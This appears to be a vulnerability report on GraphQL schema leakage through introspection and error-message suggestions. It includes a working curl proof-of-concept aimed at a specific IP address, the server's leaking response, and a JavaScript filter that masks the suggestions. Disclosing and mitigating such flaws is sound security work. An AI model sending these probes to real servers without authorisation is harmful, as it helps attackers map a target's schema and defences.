Summary
This vulnerability allows the leakage of the instruction names, parameters and default values defined by the server through introspection queries or error messages. This will enable attackers to obtain security architectures such as authentication mechanisms, rate-limiting configurations, and sensitive field markings by crafting malicious error queries, providing precise attack references for them.
POC
```bash
curl -X POST \
  -H "User-Agent: oxpecker" \
  -H "Accept-Encoding: gzip, deflate" \
  -H "Accept: */*" \
  -H "Connection: keep-alive" \
  -H "Content-Length: 73" \
  -H "Content-Type: application/json" \
  -d '{"query": "query cop { __schema { directive } }", "operationName": "cop"}' \
  'http://34.127.101.91:40410/graphql'
```
- response
```json
{"errors":[{"message":"Cannot query field \"directive\" on type \"__Schema\". Did you mean \"directives\"?","locations":[{"line":1,"column":24}],"extensions":{"code":"GRAPHQL_VALIDATION_FAILED"}}]}
```
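One way to close the error-message path shown in the response above, as an added example that is not part of the original report or the project's code: a response filter that strips the "Did you mean" suggestion before the error leaves the server. `maskGraphQLErrors` and its `hideValidationDetail` option are hypothetical names; the sample input is the response body from the report.

```javascript
// Added example: mask schema hints in GraphQL error responses.
// maskGraphQLErrors and hideValidationDetail are hypothetical names, not a library API.

// Matches the suggestion suffix seen in the reported response,
// e.g.  Did you mean "directives"?
const SUGGESTION_RE = /\s*Did you mean [^?]*\?/g;

function maskGraphQLErrors(body, { hideValidationDetail = false } = {}) {
  // Leave successful responses and non-GraphQL bodies untouched.
  if (!body || !Array.isArray(body.errors)) return body;

  const errors = body.errors.map((err) => {
    const code = err.extensions && err.extensions.code;

    if (hideValidationDetail && code === "GRAPHQL_VALIDATION_FAILED") {
      // Strict mode: drop field names, type names and locations entirely,
      // keeping only the error code for client-side handling.
      return { message: "Invalid query", extensions: { code } };
    }

    // Default mode: keep the error but remove the name suggestion.
    const message =
      typeof err.message === "string"
        ? err.message.replace(SUGGESTION_RE, "")
        : err.message;
    return { ...err, message };
  });

  // Return a copy so the original error can still be logged server-side.
  return { ...body, errors };
}

// Response body from the report, used as sample input.
const leaked = {
  errors: [
    {
      message:
        'Cannot query field "directive" on type "__Schema". Did you mean "directives"?',
      locations: [{ line: 1, column: 24 }],
      extensions: { code: "GRAPHQL_VALIDATION_FAILED" },
    },
  ],
};

console.log(JSON.stringify(maskGraphQLErrors(leaked)));
console.log(JSON.stringify(maskGraphQLErrors(leaked, { hideValidationDetail: true })));
```

This covers only the error-message path; the introspection path the summary also names has to be disabled or restricted separately.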